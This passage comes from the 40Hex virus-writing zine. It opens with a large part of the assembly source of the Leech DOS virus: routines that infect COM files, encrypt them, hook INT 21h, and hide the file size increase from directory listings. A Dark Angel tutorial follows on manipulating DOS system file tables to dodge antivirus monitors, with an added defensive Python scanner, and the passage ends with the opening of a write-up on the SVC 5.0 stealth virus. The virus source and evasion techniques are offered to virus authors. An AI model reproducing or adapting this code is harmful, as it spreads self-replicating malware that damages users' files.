                mov     cx,word ptr ds:[0]
                cmp     cx,ax                   ; check if already infected
                je      go_exitinfect
                cmp     al,0EBh                 ; jmp short?
                jne     checkifJMP
                mov     al,ah
                xor     ah,ah
                add     ax,2
                mov     di,ax                   ; di = jmp location
checkifJMP:
                cmp     al,0E9h                 ; jmp?
                jne     checkifEXE              ; nope
                mov     ax,word ptr readbuffer+1
                add     ax,3
                mov     di,ax                   ; di = jmp location
                xor     ax,ax
checkifEXE:
                cmp     ax,'MZ'
                je      exiterror
                cmp     ax,'ZM'
                jne     continue_infect
exiterror:
                stc
go_exitinfect:
                jmp     short exitinfect
                nop
continue_infect:
                mov     dx,di
                push    cx
                call    movefilepointer         ; go to jmp location
                mov     dx,virlength            ; and read 1024 more bytes
                mov     ah,3Fh
                mov     cx,dx
                call    callint21
                pop     cx
                jc      exiterror
                cmp     readbuffer,cx
                je      go_exitinfect
                mov     ax,di
                sub     ah,0FCh
                cmp     ax,filesize
                jae     exiterror
                mov     dx,filesize
                call    movefilepointer
                mov     dx,virlength            ; write virus to middle
                mov     cx,dx                   ; of file
                mov     ah,40h
                call    callint21
                jc      exitinfect
                mov     dx,di
                call    movefilepointer
                push    cs
                pop     es
                mov     di,offset readbuffer
                push    di
                push    di
                xor     si,si
                mov     cx,di
                rep     movsb
                mov     si,offset encrypt_value2
                mov     al,encrypted_file
encryptfile:                                    ; encrypt infected file
                xor     [si],al
                inc     si
                cmp     si,7FFh
                jb      encryptfile
                pop     cx
                pop     dx
                mov     ah,40h                  ; and write it to end of file
                call    callint21
exitinfect:
                pop     di
                pop     es
                pop     ds
                pop     si
                retn

int21:
                cmp     ax,4B00h                ; Execute?
                je      execute
                cmp     ah,3Eh                  ; Close?
                je      handleclose
                cmp     ah,11h                  ; Find first?
                je      findfirstnext
                cmp     ah,12h                  ; Find next?
                je      findfirstnext
exitint21:
                db      0EAh                    ; jmp far ptr
topint21        dw      0, 0

findfirstnext:
                push    si
                mov     si,offset topint21
                pushf
                call    dword ptr cs:[si]       ; call int 21 handler
                pop     si
                push    ax
                push    bx
                push    es
                mov     ah,2Fh                  ; Get DTA
                call    callint21
                cmp     byte ptr es:[bx],0FFh   ; extended FCB?
                jne     noextendedFCB
                add     bx,7                    ; convert to normal
noextendedFCB:
                mov     ax,es:[bx+17h]          ; Get time
                and     ax,1Fh                  ; and check infection stamp
                cmp     ax,1Eh
                jne     exitfindfirstnext
                mov     ax,es:[bx+1Dh]
                cmp     ax,virlength * 2 + 1    ; too small for infection?
                jb      exitfindfirstnext       ; then not infected
                sub     ax,virlength            ; alter file size
                mov     es:[bx+1Dh],ax
exitfindfirstnext:
                pop     es
                pop     bx
                pop     ax
                iret

int24:
                mov     al,3
                iret

callint21:
                pushf
                call    dword ptr cs:oldint21
                retn

movefilepointer:
                xor     cx,cx
                mov     ax,4200h
                call    callint21
                retn

execute:
                push    ax
                push    bx
                mov     cs:runningflag,0
                mov     ax,3D00h                ; open file read/only
                call    callint21
                mov     bx,ax
                mov     ah,3Eh                  ; close file
                int     21h                     ; to trigger infection

                pop     bx
                pop     ax
go_exitint21:
                jmp     short exitint21

handleclose:
                or      cs:runningflag,0        ; virus currently active?
                jnz     go_exitint21
                push    cx
                push    dx
                push    di
                push    es
                push    ax
                push    bx
                call    getint13and24
                call    setint13and24
; convert handle to filename
                mov     ax,1220h                ; get job file table entry
                int     2Fh
                jc      handleclose_noinfect    ; exit on error

                mov     ax,1216h                ; get address of SFT
                mov     bl,es:[di]
                xor     bh,bh
                int     2Fh                     ; es:di->file entry in SFT

                mov     ax,es:[di+11h]
                mov     cs:filesize,ax          ; save file size,
                mov     ax,es:[di+0Dh]
                and     al,0F8h
                mov     cs:timestore,ax         ; time,
                mov     ax,es:[di+0Fh]
                mov     cs:datestore,ax         ; and date
                cmp     word ptr es:[di+29h],'MO' ; check for COM extension
                jne     handleclose_noinfect
                cmp     byte ptr es:[di+28h],'C'
                jne     handleclose_noinfect
                cmp     cs:filesize,0FA00h      ; make sure not too large
                jae     handleclose_noinfect
                mov     al,20h                  ; alter file attribute
                xchg    al,es:[di+4]
                mov     ah,2                    ; alter open mode to read/write
                xchg    ah,es:[di+2]
                pop     bx
                push    bx
                push    ax
                call    infect
                pop     ax
                mov     es:[di+4],al            ; restore file attribute
                mov     es:[di+2],ah            ; and open mode
                mov     cx,cs:timestore
                jc      infection_not_successful
                or      cl,1Fh                  ; make file infected in
                and     cl,0FEh                 ; seconds field
infection_not_successful:
                mov     dx,cs:datestore         ; restore file time/date
                mov     ax,5701h
                call    callint21
handleclose_noinfect:
                pop     bx
                pop     ax
                pop     es
                pop     di
                pop     dx
                pop     cx
                call    callint21
                call    setint13and24
                retf    2                       ; exit with flags intact

getint13and24:
                mov     ah,13h                  ; Get BIOS int 13h handler
                int     2Fh
                mov     cs:oldint13,bx
                mov     cs:oldint13+2,es

                int     2Fh                     ; Restore it

                mov     cs:oldint24,offset int24
                mov     cs:oldint24+2,cs
                retn

setint13and24:
                push    ax
                push    si
                push    ds
                pushf
                cli
                cld
                xor     ax,ax
                mov     ds,ax                   ; ds->interrupt table

                mov     si,13h*4
                lodsw
                xchg    ax,cs:oldint13          ; replace old int 13 handler
                mov     [si-2],ax               ; with original BIOS handler
                lodsw
                xchg    ax,cs:oldint13+2
                mov     [si-2],ax

                mov     si,24h*4                ; replace old int 24 handler
                lodsw                           ; with our own handler
                xchg    ax,cs:oldint24
                mov     [si-2],ax
                lodsw
                xchg    ax,cs:oldint24+2
                mov     [si-2],ax
                popf
                pop     ds
                pop     si
                pop     ax
                retn

message         db      'The leech live ...', 0
                db      'April 1991  The Topler.'

                db      0, 0, 0, 0, 0

encrypt_value1  db      0
readbuffer      dw      0
                db      253 dup (0)

nothing1        db      0
                db      152 dup (0)
encrypt_value2  db      0
                db      614 dup (0)
encrypted_file  db      0
                db      1280 dup (0)
carrier:
                dw      20CDh

                end     leech
-------------------------------------------------------------------------------


40Hex Issue 11 Volume 3 Number 2                                      File 006

                             ─────────────────────
                             SFT's and Their Usage
                             ─────────────────────
                                 By Dark Angel
                                 Phalcon/Skism
                             ─────────────────────

       A powerful though seldom-used technique in virus writing is the use of
  the system file table, an internal DOS structure similar in some respects to
  FCBs, albeit vastly more powerful.  The system file table holds the critical
  information on the state of an open file, including the current pointer
  location, the open mode, and the file size.  Manipulation of the system file
  tables can often replace calls to corresponding DOS interrupt routines and
  therefore, when combined with other techniques, reduces the effectiveness of
  a TSR virus monitor and decreases code size.

       Each open file has a corresponding entry in a system file table.  The
  tables themselves are chained together, starting from the DWORD at offset
  04h of the DOS List of Lists (returned in ES:BX by INT 21h AH=52h).  The
  following tables come from Ralf Brown's interrupt listing.

   Format of DOS 2.x system file tables:
   Offset  Size    Description
    00h    DWORD   pointer to next file table
    04h    WORD    number of files in this table
    06h  28h bytes per file
       Offset  Size    Description
        00h    BYTE    number of file handles referring to this file
        01h    BYTE    file open mode (see AH=3Dh)
        02h    BYTE    file attribute
        03h    BYTE    drive (0 = character device, 1 = A, 2 = B, etc)
        04h 11 BYTEs   filename in FCB format (no path, no period,
                          blank-padded)
        0Fh    WORD    ???
        11h    WORD    ???
        13h    DWORD   file size???
        17h    WORD    file date in packed format (see AX=5700h)
        19h    WORD    file time in packed format (see AX=5700h)
        1Bh    BYTE    device attribute (see AX=4400h)
       ---character device---
        1Ch    DWORD   pointer to device driver
       ---block device---
        1Ch    WORD    starting cluster of file
        1Eh    WORD    relative cluster in file of last cluster accessed
       ------
        20h    WORD    absolute cluster number of current cluster
        22h    WORD    ???
        24h    DWORD   current file position???

   Format of DOS 3.x system file tables and FCB tables:
   Offset  Size    Description
    00h    DWORD   pointer to next file table
    04h    WORD    number of files in this table
    06h  35h bytes per file
       Offset  Size    Description
        00h    WORD    number of file handles referring to this file
        02h    WORD    file open mode (see AH=3Dh)
               bit 15 set if this file opened via FCB
        04h    BYTE    file attribute
        05h    WORD    device info word (see AX=4400h)
        07h    DWORD   pointer to device driver header if character device
               else pointer to DOS Drive Parameter Block (see AH=32h)
        0Bh    WORD    starting cluster of file
        0Dh    WORD    file time in packed format (see AX=5700h)
        0Fh    WORD    file date in packed format (see AX=5700h)
        11h    DWORD   file size
        15h    DWORD   current offset in file
        19h    WORD    relative cluster within file of last cluster accessed
        1Bh    WORD    absolute cluster number of last cluster accessed
               0000h if file never read or written???
        1Dh    WORD    number of sector containing directory entry
        1Fh    BYTE    number of dir entry within sector (byte offset/32)
        20h 11 BYTEs   filename in FCB format (no path/period, blank-padded)
        2Bh    DWORD   (SHARE.EXE) pointer to previous SFT sharing same file
        2Fh    WORD    (SHARE.EXE) network machine number which opened file
        31h    WORD    PSP segment of file's owner (see AH=26h)
        33h    WORD    offset within SHARE.EXE code segment of
               sharing record (see below)  0000h = none

   Format of DOS 4+ system file tables and FCB tables:
   Offset  Size    Description
    00h    DWORD   pointer to next file table
    04h    WORD    number of files in this table
    06h  3Bh bytes per file
       Offset  Size    Description
        00h    WORD    number of file handles referring to this file
        02h    WORD    file open mode (see AH=3Dh)
               bit 15 set if this file opened via FCB
        04h    BYTE    file attribute
        05h    WORD    device info word (see AX=4400h)
               bit 15 set if remote file
               bit 14 set means do not set file date/time on closing
        07h    DWORD   pointer to device driver header if character device
               else pointer to DOS Drive Parameter Block (see AH=32h)
               or REDIR data
        0Bh    WORD    starting cluster of file
        0Dh    WORD    file time in packed format (see AX=5700h)
        0Fh    WORD    file date in packed format (see AX=5700h)
        11h    DWORD   file size
        15h    DWORD   current offset in file
       ---local file---
        19h    WORD    relative cluster within file of last cluster accessed
        1Bh    DWORD   number of sector containing directory entry
        1Fh    BYTE    number of dir entry within sector (byte offset/32)
       ---network redirector---
        19h    DWORD   pointer to REDIRIFS record
        1Dh  3 BYTEs   ???
       ------
        20h 11 BYTEs   filename in FCB format (no path/period, blank-padded)
        2Bh    DWORD   (SHARE.EXE) pointer to previous SFT sharing same file
        2Fh    WORD    (SHARE.EXE) network machine number which opened file
        31h    WORD    PSP segment of file's owner (see AH=26h)
        33h    WORD    offset within SHARE.EXE code segment of
               sharing record (see below)  0000h = none
        35h    WORD    (local) absolute cluster number of last cluster
                 accessed (redirector) ???
        37h    DWORD   pointer to IFS driver for file, 00000000h if native DOS

       In order to exploit this nifty structure in DOS, the virus must first
  find the location of the appropriate system file table entry.  This may be
  easily accomplished with two undocumented DOS multiplex calls, both of which
  exist only in DOS 3+.  Given the file handle in bx, the following code will
  return the address of the corresponding system file table entry:

       mov  ax,1220h  ; Get job file table entry to ES:DI
       int  2fh       ; DOS 3+ only; CF set if bx is not an open handle
                      ; (Leech's close handler tests this with jc)

       mov  bl,es:[di] ; get number of the SFT entry for the file handle
                      ; 0FFh = handle not open
       xor  bh,bh     ; bx = SFT entry number
       mov  ax,1216h  ; get address of the system file table
       int  2fh       ; entry number bx
       ; ES:DI now points to the system file table entry

       Now that the address of the entry is known, it is a trivial matter to
  alter its fields to fit your particular needs.  Most viruses must first
  clear a file's attributes in order to open the file in read/write mode,
  since DOS refuses to open a read-only file for writing (AH=3Dh fails with
  error 5, access denied).  This handicap is easily overcome by opening the
  file in read-only mode (al = 0) and changing the open mode field (a byte in
  DOS 2.x, a word at offset 02h in DOS 3+) to 2.  This has the added benefit
  of bypassing some resident alarms, which generally do not go off if a file
  is opened in read-only mode.  Leech's close handler above does exactly this,
  swapping the original mode and attribute back into the entry once infect
  returns.  It is also possible to set the file pointer by altering the
  double word at offset 15h (in DOS 3+), which replaces a call to AH=42h.  So
  a quick and easy way to reset the file pointer to the start of the file is:
       mov  word ptr es:[di+15h],0   ; low word of current offset
       mov  word ptr es:[di+17h],0   ; high word

       It is acceptable to ignore the DOS 2.X system file table format.  DOS
  2.X is not in common use today and many programs simply refuse to run under
  such primitive versions.  The offsets used above (open mode at 02h,
  attribute at 04h, time and date at 0Dh and 0Fh, size at 11h, position at
  15h and the filename at 20h) are identical in DOS 3.X and 4+; only the entry
  size (35h versus 3Bh) and the fields from 19h to 1Fh differ, which
  simplifies the code tremendously.
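
       The following is an added example, not code from this article or from
  the Leech source: a Python decoder for the DOS 3.x and 4+ entry layouts
  tabulated above, with two heuristics a memory-dump scanner or resident
  monitor could apply to each entry.  The first is the out-of-range seconds
  field (1Eh, i.e. 60 seconds) that Leech's find-first/next handler checks
  for and its close handler stamps into infected files; the second is a file
  carrying the read-only attribute whose SFT open mode nevertheless grants
  write access, which is precisely what patching the mode word to 2 leaves
  behind.  The sample table, file names, sizes and times are constructed for
  the demo; the DOS 2.x layout is rejected rather than decoded, and for
  remote files (bit 15 of the device info word) the fields at 19h and beyond
  are not interpreted.

```python
"""Decode DOS 3.x / 4+ system file table entries from a memory image.
Added example for this article, not 40Hex or Leech code; the sample
table below is constructed for the demo and nothing here touches DOS."""
import struct

# Bytes per file entry, from the tables above (DOS 2.x, 28h, is not handled).
SFT_ENTRY_SIZE = {3: 0x35, 4: 0x3B}
ATTR_READONLY = 0x01          # bit 0 of the attribute byte at offset 04h
ACCESS_MASK = 0x07            # low 3 bits of open mode: 0 read, 1 write, 2 both

def fcb_name(raw11):
    """11-byte FCB name b'LEECH   COM' -> 'LEECH.COM'."""
    base = raw11[:8].decode("ascii", "replace").rstrip()
    ext = raw11[8:11].decode("ascii", "replace").rstrip()
    return f"{base}.{ext}" if ext else base

def unpack_time(packed):
    """AX=5700h packed time -> (hour, minute, second); seconds are stored /2."""
    return (packed >> 11) & 0x1F, (packed >> 5) & 0x3F, (packed & 0x1F) * 2

def unpack_date(packed):
    """AX=5700h packed date -> (year, month, day)."""
    return 1980 + ((packed >> 9) & 0x7F), (packed >> 5) & 0x0F, packed & 0x1F

def entry_size(dos_major):
    if dos_major < 3:
        raise ValueError("DOS 2.x entries use a different layout (first table)")
    return SFT_ENTRY_SIZE[3 if dos_major == 3 else 4]

def parse_sft_entry(entry, dos_major):
    """Decode the fields whose offsets are identical in DOS 3.x and 4+."""
    if len(entry) < entry_size(dos_major):
        raise ValueError("short SFT entry")
    refs, mode = struct.unpack_from("<HH", entry, 0x00)
    devinfo = struct.unpack_from("<H", entry, 0x05)[0]
    ftime, fdate = struct.unpack_from("<HH", entry, 0x0D)
    fsize, fpos = struct.unpack_from("<II", entry, 0x11)
    return {
        "refs": refs,
        "access": mode & ACCESS_MASK,
        "via_fcb": bool(mode & 0x8000),
        "attr": entry[0x04],
        "remote": bool(devinfo & 0x8000),   # 19h+ differ for remote files
        "time": unpack_time(ftime),
        "date": unpack_date(fdate),
        "size": fsize,
        "pos": fpos,
        "name": fcb_name(entry[0x20:0x2B]),
    }

def parse_sft_block(block, dos_major):
    """One table: DWORD far pointer to the next table, WORD count, entries."""
    nxt, count = struct.unpack_from("<IH", block, 0)
    size = entry_size(dos_major)
    entries = [parse_sft_entry(block[6 + i * size:6 + (i + 1) * size], dos_major)
               for i in range(count)]
    return nxt, entries

def anomalies(e):
    """Heuristics tied to the techniques in this article."""
    hits = []
    if e["time"][2] >= 60:                     # 1Eh in the seconds field
        hits.append("seconds field out of range (Leech infection stamp)")
    if e["attr"] & ATTR_READONLY and e["access"] != 0:
        hits.append("read-only file open for writing (patched open mode?)")
    return hits

def make_entry(name, mode, attr, ftime, fdate, size, pos, dos_major=4):
    """Construct a demo entry; only the fields decoded above are filled in."""
    buf = bytearray(entry_size(dos_major))
    struct.pack_into("<HH", buf, 0x00, 1, mode)
    buf[0x04] = attr
    struct.pack_into("<HH", buf, 0x0D, ftime, fdate)
    struct.pack_into("<II", buf, 0x11, size, pos)
    base, _, ext = name.partition(".")
    buf[0x20:0x2B] = f"{base:<8}{ext:<3}".encode("ascii")
    return bytes(buf)

# Constructed sample table: a clean file and one showing both findings.
TIME_CLEAN = (12 << 11) | (30 << 5) | 10         # 12:30:20
TIME_LEECH = (12 << 11) | (30 << 5) | 0x1E       # seconds field = 1Eh
DATE_1991 = ((1991 - 1980) << 9) | (4 << 5) | 1  # 1991-04-01
SAMPLE_BLOCK = (
    struct.pack("<IH", 0xFFFFFFFF, 2)            # last table, two entries
    + make_entry("HELLO.COM", 0x0000, 0x20, TIME_CLEAN, DATE_1991, 4096, 0)
    + make_entry("LEECH.COM", 0x0002, 0x01, TIME_LEECH, DATE_1991, 6000, 6000)
)

def scan(block=SAMPLE_BLOCK, dos_major=4):
    """Map each open file's name to the list of findings for its entry."""
    _, entries = parse_sft_block(block, dos_major)
    return {e["name"]: anomalies(e) for e in entries}

if __name__ == "__main__":
    for name, hits in scan().items():
        print(f"{name:<12} {', '.join(hits) or 'ok'}")
```

  Run as is, HELLO.COM reports clean and LEECH.COM reports both findings.
  Against a real DOS memory dump the same decoder is pointed at the chain of
  tables beginning at the DWORD at offset 04h of the List of Lists, following
  each table's next pointer until its offset word reads FFFFh; pass the DOS
  major version so that the entry size matches.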

       This is only a surface treatment of a topic which warrants further
  investigation.  Numerous opportunities exist for the enterprising virus
  author to exploit the power of the system file tables.  But the only way to
  find these opportunities is to experiment.  Have fun!

40Hex Issue 11 Volume 3 Number 2                                      File 007

                                   SVC 5.0

     SVC 5.0 is a good example of a true stealth virus.  Cheesy, primitive
stealth-wanna-be viruses "disinfect" by rewriting the files on the disk.
Not so with SVC 5.0 and all real stealth viruses, which alter only what DOS
hands back to the program (directory entries and read buffers in memory),
leaving the file on disk intact.  This has advantages, including:
        o Time savings
        o Fewer disk accesses
        o No additional disk writes are required

General Notes:
      SVC 5.0 is a parasitic, resident COM and EXE infector.  It does not
have encryption, but this is offset by the true stealth capabilities of the
virus.  Although it hides the file length increase, the virus does not suffer
from the dreaded CHKDSK crosslinking errors experienced by many early stealth
viruses.  However, the code to overcome this problem is kludgily implemented;
the virus detects execution of programs with the "HK" and "DS" strings in the
filename.  Although this helps with CHKDSK, it won't help with other programs
which work in CHKDSK's asinine fashion.

                                                -- Dark Angel
                                                   Phalcon/Skism 1993